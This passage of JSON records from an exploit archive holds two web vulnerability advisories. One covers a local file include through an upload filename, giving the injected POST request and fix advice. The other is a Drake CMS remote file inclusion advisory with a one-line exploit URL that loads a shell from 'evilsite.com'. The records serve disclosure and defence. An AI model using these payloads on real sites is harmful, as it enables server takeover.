Referer[http://localhost:49276/]\r\n Connection[keep-alive]\r\n POST-Daten:\r\n POST_DATA[-----------------------------28140821932238\r\nContent-Disposition: form-data; name=\"file\"; filename=\"%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png\"\r\nContent-Type: image/png\r\n\r\n\r\nReference(s):\r\nhttp://localhost:49276/\r\nhttp://localhost:49276//%3C./\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\nThe vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and \r\ndisallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.\r\nEncode the output in the file dir index list with the vulnerable name value to prevent an application-side injection attacks.\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.3)\n\n# 0day.today [2018-04-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23556"}, {"lastseen": "2018-01-04T03:06:50", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 2, "reporter": "GregStar", "published": "2006-11-04T00:00:00", "title": "Drake CMS < 0.2.3 ALPHA rev.916Remote File Inclusion Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-04T03:06:50", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:P/", "value": 5.4}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-11-04T00:00:00", "id": "1337DAY-ID-1112", "href": "https://0day.today/exploit/description/1112", "sourceData": "==================================================================\r\nDrake CMS < 0.2.3 ALPHA rev.916Remote File Inclusion Vulnerability\r\n==================================================================\r\n\r\n\r\n\r\n**********************************************************************************************************\r\n \r\n\t\t\t Coding 4 Fun (c4f.pl) \r\n\t\t\t \r\n**********************************************************************************************************\r\n\r\n* Drake CMS v0.2.2 ALPHA rev.846 (http://drakecms.org) ; \r\n\r\n* Class = Remote File Inclusion ;\r\n\r\n* Found by = GregStar (gregstar[at]c4f[dot]pl) ;\r\n\r\n-------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n- Vulnerable Code in \"includes/xhtml.php\" :\r\n\r\n \tinclude $d_root.'classes/kses.php';\r\n\r\n++++++++++++++++++++++++++++++++++++++++++++\r\n\r\n- Exploit:\r\n\r\n\thttp://[target]/[path]/includes/xhtml.php?d_root=http://evilsite.com/shell?\r\n\r\n\r\n------------------------------------------------------------------------------------------------------------------\r\n\r\nGr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,reyw,[email\u00a0protected] and for all friends.\r\n\r\n**************************************************************************************************************\r\n\r\n\r\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/1112"}]}}